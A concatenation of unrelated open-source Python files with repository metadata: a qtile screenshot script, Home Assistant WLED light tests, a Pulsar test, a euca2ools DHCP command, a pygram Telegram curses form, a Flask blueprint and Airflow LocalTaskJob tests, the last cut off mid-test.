import argparse
import os
import sys
import time
from screenshots import Client, Screenshooter
def env(name, default):
return os.environ.get(name, default)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-a",
"--commands-after",
dest="commands_after",
default="",
help="Commands to run after finishing to take screenshots. Space-separated string.",
)
parser.add_argument(
"-b",
"--commands-before",
dest="commands_before",
default="",
help="Commands to run before starting to take screenshots. Space-separated string.",
)
parser.add_argument(
"-c",
"--clear",
dest="clear",
action="store_true",
default=False,
help="Whether to delete the PNG files after animating them into GIFs.",
)
parser.add_argument(
"-C",
"--comment",
dest="comment",
default="",
help="Comment to append at the end of the screenshot filenames.",
)
parser.add_argument(
"-d",
"--delay",
dest="delay",
default=env("DELAY", "1x1"),
help="Delay between each frame of the animated GIF. Default: 1x1.",
)
parser.add_argument(
"-g",
"--screenshot-group",
dest="screenshot_group",
default="s",
help="Group to switch to to take screenshots.",
)
parser.add_argument(
"-G",
"--geometry",
dest="geometry",
default=env("GEOMETRY", "240x135"),
help="The size of the generated screenshots (WIDTHxHEIGHT).",
)
parser.add_argument(
"-n",
"--name",
dest="name",
default="",
help="The name of the generated screenshot files . Don't append the extension.",
)
parser.add_argument(
"-o",
"--output-dir",
dest="output_dir",
default="docs/screenshots/layout",
help="Directory in which to write the screenshot files.",
)
parser.add_argument(
"-w",
"--windows",
dest="windows",
type=int,
default=3,
help="Number of windows to spawn.",
)
parser.add_argument(
"layout",
choices=[
"bsp",
"columns",
"matrix",
"monadtall",
"monadwide",
"ratiotile",
# "slice",
"stack",
"tile",
"treetab",
"verticaltile",
"zoomy",
],
help="Layout to use.",
)
parser.add_argument(
"commands",
nargs=argparse.ONE_OR_MORE,
help="Commands to run and take screenshots for.",
)
args = parser.parse_args()
client = Client()
# keep current group in memory, to switch back to it later
original_group = client.current_group()
# prepare layout
client.switch_to_group(args.screenshot_group)
client.prepare_layout(
args.layout,
args.windows,
args.commands_before.split(" ") if args.commands_before else [],
)
# wait a bit to make sure everything is in place
time.sleep(0.5)
# prepare screenshot output path prefix
output_dir = os.path.join(args.output_dir, args.layout)
os.makedirs(output_dir, exist_ok=True)
name = args.name or "_".join(args.commands) or args.layout
if args.comment:
name += "-{}".format(args.comment)
output_prefix = os.path.join(output_dir, name)
print("Shooting {}".format(output_prefix))
# run commands and take a screenshot between each, animate into a gif at the end
screen = Screenshooter(output_prefix, args.geometry, args.delay)
screen.shoot()
for cmd in args.commands:
client.run_layout_command(cmd)
time.sleep(0.05)
screen.shoot()
screen.animate(clear=args.clear)
if args.commands_after:
for cmd in args.commands_after.split(" "):
client.run_layout_command(cmd)
time.sleep(0.05)
# kill windows
client.kill_group_windows()
# switch back to original group
client.switch_to_group(original_group)
sys.exit(0)
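# A hypothetical invocation sketch (the layout commands "down" and "up" are
# placeholders, not guaranteed commands of the chosen layout); the file name is
# taken from this script's path:
#
#     python take_one.py -w 3 -o docs/screenshots/layout monadtall down up
#
# Each positional command after the layout name is sent with
# client.run_layout_command(), with one initial screenshot and one more after
# each command, before the frames are animated into a GIF.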
| {
"content_hash": "aa1a7a55e631b36fb9d3cebcf7751bbd",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 92,
"avg_line_length": 26.853503184713375,
"alnum_prop": 0.5633301707779886,
"repo_name": "qtile/qtile",
"id": "205c9a783d7375985ae44b36c78d6df303a31a85",
"size": "4239",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "docs/screenshots/take_one.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "625"
},
{
"name": "Python",
"bytes": "2202676"
},
{
"name": "Shell",
"bytes": "8090"
}
],
"symlink_target": ""
} |
"""Tests for the WLED light platform."""
import aiohttp
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_HS_COLOR,
ATTR_RGB_COLOR,
ATTR_TRANSITION,
ATTR_WHITE_VALUE,
DOMAIN as LIGHT_DOMAIN,
)
from homeassistant.components.wled.const import (
ATTR_INTENSITY,
ATTR_PALETTE,
ATTR_PLAYLIST,
ATTR_PRESET,
ATTR_SPEED,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_ICON,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import HomeAssistant
from tests.components.wled import init_integration
from tests.test_util.aiohttp import AiohttpClientMocker
async def test_rgb_light_state(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test the creation and values of the WLED lights."""
await init_integration(hass, aioclient_mock)
entity_registry = await hass.helpers.entity_registry.async_get_registry()
# First segment of the strip
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Solid"
assert state.attributes.get(ATTR_HS_COLOR) == (37.412, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 128
assert state.attributes.get(ATTR_PALETTE) == "Default"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_SPEED) == 32
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light")
assert entry
assert entry.unique_id == "aabbccddeeff_0"
# Second segment of the strip
state = hass.states.get("light.wled_rgb_light_1")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Blink"
assert state.attributes.get(ATTR_HS_COLOR) == (148.941, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 64
assert state.attributes.get(ATTR_PALETTE) == "Random Cycle"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_SPEED) == 16
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_1")
assert entry
assert entry.unique_id == "aabbccddeeff_1"
async def test_switch_change_state(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test the change of state of the WLED switches."""
await init_integration(hass, aioclient_mock)
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_ON
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_OFF
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_EFFECT: "Chase",
ATTR_ENTITY_ID: "light.wled_rgb_light",
ATTR_RGB_COLOR: [255, 0, 0],
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_BRIGHTNESS) == 42
assert state.attributes.get(ATTR_EFFECT) == "Chase"
assert state.attributes.get(ATTR_HS_COLOR) == (0.0, 100.0)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgb_light", ATTR_COLOR_TEMP: 400},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (28.874, 72.522)
async def test_light_error(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test error handling of the WLED switches."""
aioclient_mock.post("http://example.local:80/json/state", exc=aiohttp.ClientError)
await init_integration(hass, aioclient_mock)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_UNAVAILABLE
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgb_light_1"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_1")
assert state.state == STATE_UNAVAILABLE
async def test_rgbw_light(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test RGBW support for WLED."""
await init_integration(hass, aioclient_mock, rgbw=True)
state = hass.states.get("light.wled_rgbw_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (0.0, 100.0)
assert state.attributes.get(ATTR_WHITE_VALUE) == 139
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgbw_light", ATTR_COLOR_TEMP: 400},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgbw_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (28.874, 72.522)
assert state.attributes.get(ATTR_WHITE_VALUE) == 139
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgbw_light", ATTR_WHITE_VALUE: 100},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgbw_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (28.874, 72.522)
assert state.attributes.get(ATTR_WHITE_VALUE) == 100
| {
"content_hash": "4173d231fb156ec29f2cc97ba0db9522",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 86,
"avg_line_length": 32.733333333333334,
"alnum_prop": 0.6673977753407488,
"repo_name": "leppa/home-assistant",
"id": "037081608af422906169098efc02a50fc1639142",
"size": "6383",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "tests/components/wled/test_light.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "18957740"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
} |
import os
import sys
import traceback
# Add the pulsar path
thispath = os.path.dirname(os.path.realpath(__file__))
psrpath = os.path.join(os.path.dirname(thispath), "modules")
sys.path.insert(0, psrpath)
import pulsar as psr
from pulsar.output import *
from pulsar.testing import *
from pulsar.system import *
from helper.SetOperations import test_set_operations
from helper.TestAtoms import nonane
def Run():
try:
tester = Tester("Testing System class - set operations")
tester.print_header()
atoms = list(nonane)
a1 = Atom(atoms[0])
a2 = Atom(atoms[0])
a3 = Atom(atoms[0])
a4 = Atom(atoms[0])
a1[0] += 1.0e-10 # Slightly different coords
a2[1] += 1.0e-10
a3[2] += 1.0e-10
a4.Z = 10 # Different Z
badatoms = [ a1, a2, a3, a4 ]
u = AtomSetUniverse()
for a in atoms:
u.insert(a)
s0 = System(u, False)
s1 = System(u, False)
s2 = System(u, True)
s3 = System(u, False)
s9 = System(u, False)
for it in atoms[:3]:
s1.insert(it)
for it in reversed(atoms):
s3.insert(it)
for it in atoms[3:]:
s9.insert(it)
################################
# Do basic testing of set stuff
################################
test_set_operations(tester, System, atoms, badatoms,
True, s0, s1, s2, s3, s9)
tester.print_results()
except Exception as e:
print_global_output("Caught exception in main handler. Contact the developers\n")
traceback.print_exc()
print_global_error("\n")
print_global_error(str(e))
print_global_error("\n")
psr.initialize(sys.argv, color = True, debug = True)
Run()
psr.finalize()
| {
"content_hash": "2ca8ee79c2ce40aea2552f9e3bf6efb6",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 87,
"avg_line_length": 23.189873417721518,
"alnum_prop": 0.550764192139738,
"repo_name": "pulsar-chem/Pulsar-Core",
"id": "6a796813af70de899f8474ed24b2458e67152db0",
"size": "1857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/old/Old2/Molecule_Set.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "7784"
},
{
"name": "C++",
"bytes": "1100500"
},
{
"name": "CMake",
"bytes": "24227"
},
{
"name": "Python",
"bytes": "739363"
},
{
"name": "Shell",
"bytes": "2851"
}
],
"symlink_target": ""
} |
from requestbuilder import Arg
from euca2ools.commands.ec2 import EC2Request
class AssociateDhcpOptions(EC2Request):
DESCRIPTION = 'Associate a DHCP option set with a VPC'
ARGS = [Arg('DhcpOptionsId', metavar='DHCPOPTS', help='''ID of the DHCP
option set to associate, or "default" (required)'''),
Arg('-c', '--vpc', dest='VpcId', metavar='VPC', required=True,
help='''ID of the VPC to associate the DHCP option set
with (required)''')]
def print_result(self, _):
print self.tabify(('DHCPOPTIONS',
self.args['DhcpOptionsId'], self.args['VpcId']))
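# A hedged usage sketch; the command name is inferred from the module path and
# the resource IDs below are placeholders:
#
#     euca-associate-dhcp-options dopt-12345678 -c vpc-87654321
#
# which, via print_result above, would emit a tab-separated line like:
#     DHCPOPTIONS    dopt-12345678    vpc-87654321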
| {
"content_hash": "b90da8e1cd4f83390fa31396951a31ff",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 75,
"avg_line_length": 41.125,
"alnum_prop": 0.60790273556231,
"repo_name": "vasiliykochergin/euca2ools",
"id": "d981ad8499a2d73a0ff7d13be103d7b48cbcf519",
"size": "2000",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "euca2ools/commands/ec2/associatedhcpoptions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1220919"
},
{
"name": "Shell",
"bytes": "872"
}
],
"symlink_target": ""
} |
import asyncio
import curses
import weakref
from datetime import datetime
import npyscreen
from DictObject import DictObject
from npyscreen import ActionFormV2WithMenus, wgwidget as widget
from pytg.exceptions import NoResponse, IllegalResponseException
from pytg.utils import coroutine
from pygram import printed, check_version
from pygram.boxtitle import DialogBox, HistoryBox, ChatBox
from pygram.menu import CustomMenu
from pygram.pg_threading import PGThread
class PyGramForm(ActionFormV2WithMenus):
BLANK_LINES_BASE = 1
OK_BUTTON_BR_OFFSET = (1, 6)
CANCEL_BUTTON_BR_OFFSET = (5, 12)
OK_BUTTON_TEXT = "QUIT"
CANCEL_BUTTON_TEXT = "SEND"
MENUS = []
def __init__(self, *args, **kwargs):
self.TG = kwargs.pop('TG', None)
self.form_width = 30
self.receiver_thread = None
self.full_name = printed(self.TG.sender.get_self())
self.dialog_list = None
self.chat_history = None
self.chat_box = None
self.contacts_list = []
self.editw = 0
super().__init__(*args, **kwargs)
self.current_peer = None
self.version_checked = False
def display_menu_advert_at(self):
return 2, self.lines - 1
def draw_form(self):
super().draw_form()
menu_advert = " " + self.__class__.MENU_KEY + ": Menu "
x, y = self.display_menu_advert_at()
if isinstance(menu_advert, bytes):
menu_advert = menu_advert.decode('utf-8', 'replace')
self.add_line(
y, x,
menu_advert,
self.make_attributes_list(menu_advert, curses.A_NORMAL),
self.columns - x
)
def set_up_exit_condition_handlers(self):
super().set_up_exit_condition_handlers()
self.how_exited_handers.update({
widget.EXITED_ESCAPE: self.find_quit_button
})
def find_quit_button(self):
self.editw = len(self._widgets__) - 1
def on_ok(self, direct=False):
if direct:
self.parentApp.switchForm(None)
ans = npyscreen.notify_yes_no('Are you sure, you want to quit?')
if ans:
self.TG.receiver.stop()
self.parentApp.switchForm(None)
def check_version(self, **keywords):
if not self.version_checked:
loop = keywords.get('loop')
result = loop.run_until_complete(check_version())
if not result:
npyscreen.notify("New version released please check.")
self.version_checked = True
def on_screen(self):
if not hasattr(self, 'checker_thread'):
loop = asyncio.get_event_loop()
self.checker_thread = PGThread(target=self.check_version, args=(), kwargs={'loop': loop})
self.checker_thread.daemon = True
self.checker_thread.start()
def on_cancel(self):
""" Message will be send """
if self.current_peer:
text = self.chat_box.entry_widget.value.strip()
if text:
send_status = self.TG.sender.send_msg(self.current_peer.print_name, text)
if send_status:
self.chat_box.entry_widget.value = ""
self.load_history(current_dialog=self.current_peer)
self.editw = self._widgets__.index(self.chat_box)
else:
npyscreen.notify_ok_cancel('Please select receiver first.')
def add_menu(self, name=None, *args, **keywords):
if not hasattr(self, '_NMenuList'):
self._NMenuList = []
_mnu = CustomMenu(name=name, *args, **keywords)
self._NMenuList.append(_mnu)
return weakref.proxy(_mnu)
def create(self):
self.dialog_list = self.add(DialogBox, name="Dialog List", scroll_exit=True,
editable=True, max_width=self.form_width,
max_height=self._max_physical()[0] - 10)
self.load_dialogs()
self.chat_history = self.add(HistoryBox, name="", scroll_exit=True,
editable=True, relx=self.form_width + 2, rely=2,
max_height=self._max_physical()[0] - 10, exit_left=True, exit_right=True)
self.chat_box = self.add(ChatBox, name='{}'.format(self.full_name), scroll_exit=True,
editable=True, max_height=5)
self.contacts_list_menu = self.add_menu(name="Contact List")
self.contacts_list_menu.addItemsFromList(
list(map(lambda x: (x, self.start_dialog, None, None, None, {'contact': x}), self.load_contacts_list()))
)
self.start_receiver()
def load_contacts_list(self):
self.contacts_list = self.TG.sender.contacts_list()
return self.contacts_list
def start_dialog(self, contact):
# start a chat with selected one, what about dialog_list?
contact.printed = printed(contact)
self.current_peer = contact
self.load_history(current_dialog=self.current_peer)
def start_receiver(self):
self.receiver_thread = PGThread(target=self.trigger_receiver)
self.receiver_thread.daemon = True
self.receiver_thread.start()
@coroutine
def message_loop(self):
try:
while True:
msg = (yield)
if msg.event != "message" or msg.own:
continue
else:
self.load_dialogs()
if self.current_peer:
if ((self.current_peer.peer_type == 'user' and
self.current_peer.peer_id == msg.sender.peer_id) or
(self.current_peer.peer_type == 'chat' and
self.current_peer.peer_id == msg.receiver.peer_id)):
self.load_history(trigger_movement=False, current_dialog=self.current_peer)
except (GeneratorExit, KeyboardInterrupt, TypeError, NoResponse) as err:
print(err)
pass
def trigger_receiver(self):
try:
self.TG.receiver.start()
self.TG.receiver.message(self.message_loop())
except TypeError:
npyscreen.notify("Sorry, An error occurred please restart the app :(")
self.on_ok(direct=True)
def load_dialogs(self):
dialog_list = list(reversed(self.TG.sender.dialog_list(retry_connect=True)))
# Formating display for dialogs
peer_index = None
for dial in dialog_list:
dial.printed = printed(dial)
if hasattr(self, 'current_peer') and dial == self.current_peer:
peer_index = dialog_list.index(dial)
try:
history = self.TG.sender.history(dial.print_name, 2, 0, retry_connect=True)
unread = len(list(filter(lambda x: x.unread, history)))
dial.unread = unread
except (IllegalResponseException, NoResponse):
dial.unread = 0
self.parentApp.dialog_list = dialog_list
self.dialog_list.values = dialog_list
self.dialog_list.entry_widget.value = peer_index
self.dialog_list.update()
self.find_next_editable()
self.editw -= 1
def load_history(self, **keywords):
current_dialog = keywords.get('current_dialog', None)
if current_dialog:
self.current_peer = current_dialog
self.chat_history.entry_widget.lines_placed = False
self.chat_history.name = (getattr(current_dialog, 'title', '') or
getattr(current_dialog, 'printed', '') or 'Unknown')
while True:
try:
history = self.TG.sender.history(current_dialog.print_name, 100, 0, retry_connect=True)
break
except NoResponse:
continue
unread = list(filter(lambda x: x.unread, history))
if unread:
unread_index = history.index(unread[0])
history = history[:unread_index] + ["--New Messages--"] + history[unread_index:]
self.chat_history.values = list(
filter(lambda x: x,
map(lambda x: (
isinstance(x, str) and x or '{} ({})\n\t{}'.format(
printed(getattr(x, 'from')),
datetime.fromtimestamp(getattr(x, 'date', '')),
(getattr(x, 'text', '') or
getattr(getattr(x, 'media', DictObject()), 'address', '')))),
history)))
self.parentApp.fill_history()
self.find_next_editable()
self.editw -= 1
self.chat_history.entry_widget.lines_placed = True
self.chat_history.update()
self.chat_history.entry_widget.h_show_end(None)
self.find_next_editable()
self.editw -= 1
if keywords.get('trigger_movement', True):
# Force movement to chat box
for wid in self._widgets__:
if wid == self.chat_box:
self.editw = self._widgets__.index(wid)
self._widgets__[self.editw].editing = True
self._widgets__[self.editw].edit()
self._widgets__[self.editw].display()
break
wid.editing = False
wid.how_exited = widget.EXITED_DOWN
self.handle_exiting_widgets(wid.how_exited)
self.load_dialogs()
self.dialog_list.update()
| {
"content_hash": "aad9e86fdde1635b30abf5cae76820fd",
"timestamp": "",
"source": "github",
"line_count": 243,
"max_line_length": 116,
"avg_line_length": 39.97119341563786,
"alnum_prop": 0.5546175229074436,
"repo_name": "RedXBeard/pygram",
"id": "4d595583596fa3ea18083dee461273a5b3c51350",
"size": "9713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pygram/actionform.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23976"
}
],
"symlink_target": ""
} |
from flask import Blueprint
frontend = Blueprint('frontend', __name__)
from . import views
| {
"content_hash": "a83573be6286b5cc3bdedcf574368ae9",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 42,
"avg_line_length": 15.666666666666666,
"alnum_prop": 0.723404255319149,
"repo_name": "rblack42/rstRefactored",
"id": "e269d7590a67b1f539388c7352d4ef5ff75ea98d",
"size": "94",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rst2/frontend/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Puppet",
"bytes": "1430"
},
{
"name": "Python",
"bytes": "6979"
}
],
"symlink_target": ""
} |
import multiprocessing
import os
import time
import unittest
import uuid
from unittest import mock
import pytest
from mock import patch
from airflow import settings
from airflow.exceptions import AirflowException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models.dag import DAG
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
self.assertGreater(len(heartbeat_records), 2)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
# Assert that the difference is small enough
delta = (time2 - time1).total_seconds()
self.assertAlmostEqual(delta, job.heartrate, delta=0.05)
@pytest.mark.xfail(condition=True, reason="This test might be flaky in postgres/mysql")
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
@pytest.mark.quarantined
def test_localtaskjob_maintain_heart_rate(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
self.assertEqual(mock_start.call_count, 1)
self.assertEqual(mock_ret_code.call_count, 2)
time_end = time.time()
self.assertEqual(self.mock_base_job_sleep.call_count, 1)
self.assertEqual(job1.state, State.SUCCESS)
# Given that we have patched the sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already made sure that the patched sleep call is only called once
self.assertLess(time_end - time_start, job1.heartrate)
session.close()
def test_mark_failure_on_failure_callback(self):
"""
Test that ensures that mark_failure in the UI fails
the task, and executes on_failure_callback
"""
data = {'called': False}
def check_failure(context):
self.assertEqual(context['dag_run'].dag_id, 'test_mark_failure')
data['called'] = True
def task_function(ti):
print("python_callable run in pid %s", os.getpid())
with create_session() as session:
self.assertEqual(State.RUNNING, ti.state)
ti.log.info("Marking TI as failed 'externally'")
ti.state = State.FAILED
session.merge(ti)
session.commit()
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
data['reached_end_of_sleep'] = True
with DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE) as dag:
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_failure_callback=check_failure)
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
with timeout(30):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callable above bigger
job1.run()
ti.refresh_from_db()
